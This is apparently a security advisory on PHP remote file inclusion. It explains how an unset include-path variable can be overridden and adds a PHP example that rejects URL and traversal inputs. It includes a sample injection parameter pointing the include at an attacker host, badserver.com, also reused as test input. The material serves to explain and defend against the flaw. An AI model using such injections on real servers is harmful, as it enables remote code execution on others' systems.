PHP Injection
Updated 5/16/03
Impact
Remote attackers may be able to execute arbitrary PHP commands
on the web server.
Background
PHP (Hypertext Preprocessor) is
a scripting language used for web development. PHP scripts can
be embedded into HTML files, and are run by the
web server when the file is requested by a web browser.
The Problem
Some PHP scripts do not adequately control important
variables such as the directory path to supporting scripts.
A remote attacker is able to manipulate these variables
by sending specially crafted HTTP requests,
thereby allowing the attacker to run arbitrary PHP scripts.
For example, a PHP script may include the following code:
include($root_dir . 'common.php');
and the default value of the variable $root_dir
may be /var/www/php. In this case, the
PHP processor should execute the script
/var/www/php/common.php within the current
script.
Now suppose an attacker who owns a web server called
badserver.com runs the script with the input
parameter:
root_dir=http://badserver.com/
In this case, the PHP processor would execute the
script http://badserver.com/common.php.
The attacker could execute arbitrary code on the vulnerable
server by placing the code into the common.php
file on his or her own server.
Resolution
To fix this problem, all PHP scripts should properly
initialize directory paths and other important constants, so
they cannot be manipulated by attackers. For fix information
on specific products, see the appropriate reference below.
Note that in many of the affected software products, the
same problem lies in more than one script, even if only
one is reported by SAINT.
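The fix described above, as an added example that is not code from the original page or from any affected product: the script assigns its own directory constant, and any variable part of an include path is checked before use, which goes one step beyond the initialization the text asks for. The function name resolve_include(), the constant ROOT_DIR and the temporary directory are assumptions made for the illustration.

```php
<?php
// Added example. resolve_include() and ROOT_DIR are hypothetical names;
// the URL below is the sample request value from the text.

// Vulnerable pattern from the text: $root_dir is never set by the script,
// so a request parameter can supply it.
//   include($root_dir . 'common.php');

function resolve_include(string $baseDir, string $script): string
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory does not exist');
    }
    // Reject anything with a URL scheme (http://, ftp://, php://, ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $script)) {
        throw new RuntimeException('URL not allowed');
    }
    // realpath() collapses "../" and symlinks; false means no such file.
    $path = realpath($base . DIRECTORY_SEPARATOR . $script);
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('outside base directory');
    }
    return $path;
}

// Constructed fixture standing in for /var/www/php/common.php.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'include_demo_' . getmypid();
@mkdir($root);
file_put_contents($root . DIRECTORY_SEPARATOR . 'common.php', "<?php // shared code\n");

// The fix: the directory is a constant assigned by the script itself,
// so no request parameter can replace it.
define('ROOT_DIR', $root);

// Constructed inputs: one legitimate name, the value from the text, one relative path.
foreach (['common.php', 'http://badserver.com/common.php', '../common.php'] as $name) {
    try {
        echo $name, ' => ', resolve_include(ROOT_DIR, $name), "\n";
    } catch (RuntimeException $e) {
        echo $name, ' => rejected (', $e->getMessage(), ")\n";
    }
}

// Remove the fixture.
unlink($root . DIRECTORY_SEPARATOR . 'common.php');
rmdir($root);
```

Only the first input resolves to a path; the other two are rejected before any include could run. PHP's allow_url_include setting, which is off by default in versions that have it, is a second layer that blocks URL includes at the interpreter level.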
Where can I read more about this?
For more information on this and other PHP scripting
vulnerabilities, see
On the Security of PHP by Jordan Dimov.
For more information on specific PHP injection vulnerabilities,
see the following advisories: